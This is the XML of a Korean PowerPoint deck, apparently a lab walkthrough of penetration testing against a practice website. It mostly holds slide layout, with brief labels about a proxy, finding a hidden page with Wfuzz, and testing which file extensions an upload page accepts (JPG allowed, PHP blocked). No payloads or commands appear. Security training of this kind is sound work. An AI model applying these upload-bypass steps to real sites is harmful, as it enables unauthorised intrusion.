            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10447965" y="8496300"/>
              <a:ext cx="1275733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로그서버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6D803E3-4550-45C2-BF2B-B1BC948E8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17837" y="6923866"/>
              <a:ext cx="1723003" cy="1443199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556C88A-AD83-4D98-AB24-7E7779C9FEC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6187249" y="8566150"/>
              <a:ext cx="1535021" cy="6096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모의해킹</a:t>
              </a:r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연습사이트</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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29CD8A39-D4F5-4D87-BBAC-A90167942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1535" y="6240236"/>
              <a:ext cx="977900" cy="800100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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9F8B7D92-EBDC-4D90-90FE-810BBE08B176}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8652447" y="7650478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A1ACAB33-A136-47C3-9BE3-28407862EE37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8749153" y="7074531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B23E1BAE-9C44-42B5-98B5-836A0A157ADA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4076244" y="7650478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BE04B5ED-A942-4395-9B27-281932198903}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4172950" y="7074531"/>
              <a:ext cx="1133280" cy="561344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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12805251-A6AC-477C-BCB9-92DA97ED41F5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7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08150" y="1212850"/>
            <a:ext cx="345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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 5 Medium"/>
              </a:rPr>
              <a:t>모의해킹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="-500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 5 Medium"/>
              </a:rPr>
              <a:t> 연습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사이트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51254F-B784-498E-81C3-C0A1C3D0F04E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341686" y="1798568"/>
            <a:ext cx="11548814" cy="42937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580D4E-A9F9-4275-9A0E-4340222E72D7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341686" y="6092272"/>
            <a:ext cx="11548814" cy="2708828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43211F8B-1075-4038-A03D-59CCCCE98FF4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24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33550" y="1181100"/>
            <a:ext cx="23812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 </a:t>
            </a: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 p r o x y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ED7C9-3ABE-4E8E-B5AB-1EF150339E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817" b="4159"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346199" y="1759724"/>
            <a:ext cx="8407401" cy="5413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231F07-4125-4182-8434-B8F3DD4FF1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5062" y="3881353"/>
            <a:ext cx="7589838" cy="56388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06CF82-FFD4-481C-B105-8867D16D7DA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5502"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4945062" y="7621877"/>
            <a:ext cx="4541845" cy="1890810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFA4257-AE44-4417-838D-DEDAABAA25F2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W F U Z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" spc="-5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94BEE5-0704-4858-963B-55078BE8821D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1344612" y="1271588"/>
            <a:ext cx="7518400" cy="8386123"/>
            <a:chOff x="1358900" y="1257300"/>
            <a:chExt cx="7518400" cy="83861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DDF978-252F-453B-92EA-30D84FAD6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1257300"/>
              <a:ext cx="7517272" cy="183230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B23E465-44D8-4417-8083-4B2944A87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3080974"/>
              <a:ext cx="7517272" cy="208406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227EE5D-B5C4-49B0-8B63-545E8260D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0" t="27406" r="8992" b="12061"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1358900" y="5149850"/>
              <a:ext cx="7504572" cy="4493573"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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537700" y="623623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업로드 가능한 페이지</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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9700545" y="3051338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Wfuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 숨겨진 페이지 발견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BA2510-DE88-490D-99DE-30BD5D2468EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374308" y="3909785"/>
            <a:ext cx="7417280" cy="2892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286EA5-3307-402A-A0D6-316F9594A643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374308" y="2367076"/>
            <a:ext cx="7438708" cy="4902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A26418D-A572-478D-98C3-5810C44C0233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96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07877D-0844-4802-BBD0-1119CEC39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3895725" cy="3343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B5360C-400E-497D-B100-35EBD36D91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4639618"/>
            <a:ext cx="8286750" cy="3390900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5732462" y="222234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Jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>확장자 업로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>되는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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779000" y="53866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업로드된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 이미지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C150F1-041F-448F-ADBC-F8B64D8A61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8001685"/>
            <a:ext cx="3286125" cy="1457325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5327650" y="82675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PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>확장자 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>업로드 불가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4DA9253E-EEDF-4762-B8DE-051B7B01744A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20828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2C7173-72DE-42E0-A1FA-78D8139D2260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984422" y="1489218"/>
            <a:ext cx="2698655" cy="595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8A74F950-1FE4-4F8E-9958-AEFC3D00A501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7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1694</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>371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8" baseType="lpstr">
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>S-Core Dream 5 Medium</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>S-Core Dream 7 ExtraBold</vt:lpstr>
      <vt:lpstr>Gmarket Sans Bold</vt:lpstr>
      <vt:lpstr>S-Core Dream 4 Regular</vt:lpstr>
      <vt:lpstr>NotoSansKR</vt:lpstr>
      <vt:lpstr>Montserrat Bold</vt:lpstr>
      <vt:lpstr>Pretendard Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Pretendard Bold</vt:lpstr>
      <vt:lpstr>Pretendard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147</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-24T08:36:33Z</dcterms:modified>
</cp:coreProperties>
</file>